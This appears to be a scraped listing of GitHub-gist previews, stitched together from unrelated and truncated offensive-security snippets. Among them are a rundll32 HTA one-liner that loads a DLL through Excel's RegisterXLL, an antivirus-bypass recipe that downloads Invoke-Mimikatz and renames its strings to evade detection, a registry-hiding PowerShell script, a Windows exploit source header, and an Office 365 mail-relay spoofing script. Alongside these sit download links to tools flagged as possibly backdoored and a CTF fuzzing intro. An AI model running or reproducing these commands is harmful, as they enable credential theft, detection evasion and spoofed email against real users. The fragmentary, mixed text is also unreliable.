Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux | |
1.) Enable Developer Mode | |
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1" | |
2.) Enable Windows Subsystem for Linux | |
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux | |
3.) Reboot |
# requires PSReflect.ps1 to be in the same directory as this script | |
. .\PSReflect.ps1 | |
$Module = New-InMemoryModule -ModuleName RegHide | |
# Define our structs. | |
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx | |
# typedef struct _UNICODE_STRING { | |
# USHORT Length; | |
# USHORT MaximumLength; |
// Original source link https://twitter.com/hFireF0X/status/887930221466443776 | |
// If you are here from any other link - do know that they just steal original info without giving any credit to source | |
// This bug has been fixed in 16273 public build. | |
#include "global.h" | |
HINSTANCE g_hInstance; | |
HANDLE g_ConOut = NULL; | |
BOOL g_ConsoleOutput = FALSE; | |
WCHAR g_BE = 0xFEFF; |
REM rundll32 mshtml.dll HTA one-liner command: | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
#!/usr/bin/env python2 | |
# Example usage: office_365_mail_relay.py --from-addr [email protected] --to-addr [email protected] --domain example.com --subject "SPAM TIME!" --from-name "John Doe" --to-name "John Smith" | |
# 20170709 - @Und3rf10w | |
import dns.resolver | |
import socket | |
import smtplib | |
import argparse | |
from termcolor import cprint |
UnConfuserEx https://mega.nz/#!U1hxwQKb!7WFBSjrZgg8ieFp15K0RJW8rWuyMHZTO9bpCekhBQfY | |
ConfuserExDupPopPatcher https://mega.nz/#!IkhHzZDS!vPYABdYJtuDIGJBHdKzwIqLajxugJaNlENWr5CWjNlo | |
ConfuserExStringDecryptor https://mega.nz/#!plhxRJyY!Vq9eRS-gixC__q75860gDD8Tcm_ncOfCCCP_HQKguUM | |
ConfuserExCallFixer https://mega.nz/#!0gZFlbwC!KFka_Kxe-GuU-d8COni91xmGPbiRnbX6lBLYAomn7No | |
I'm not responsible for what you do with these -- they may very well be backdoored |
#!/bin/bash | |
# small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login) | |
# sudo apt install curl | |
parse(){ | |
local IFS=\> | |
read -d \< CELL VALUE | |
} |
This challenge gave parts of the points as soon as you find a crash in the binary, which was a forking network service. With a short LD_PRELOAD library, you can bypass all the networking code and fuzz the handler function directly with afl using the qemu mode.
The basic steps: